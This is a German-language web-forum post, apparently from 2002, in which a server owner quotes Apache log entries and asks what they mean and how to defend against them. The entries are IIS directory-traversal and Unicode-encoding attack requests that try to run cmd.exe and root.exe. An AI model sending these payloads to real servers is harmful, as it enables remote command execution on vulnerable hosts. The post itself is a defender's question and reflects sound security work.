hackversuche?

hi zäme

ich hatte auf meinem webserver (apache), trotz firewall öfters solche versuchte zugriffe (auszug aus dem logfile):

203.132.142.13 - - [23/Aug/2002:14:00:05 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:06 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:07 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:08 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:09 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:10 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:14 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:15 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:16 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:17 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:19 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:20 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:21 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:31 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:32 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:33 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"

sie kamen aber von den unterschiedlichsten ips. das ist jetzt einfach so ein versuch, von dem es etwa 5 gab.

was hat das zu bedeuten? was wollte er da ausführen? wie kann ich mich dagegen schützen?

greetz ganto

wow, wie man da wieder dazulernt, auf das wäre ich jetzt ehrlichgesagt nicht gekommen. :))

thanks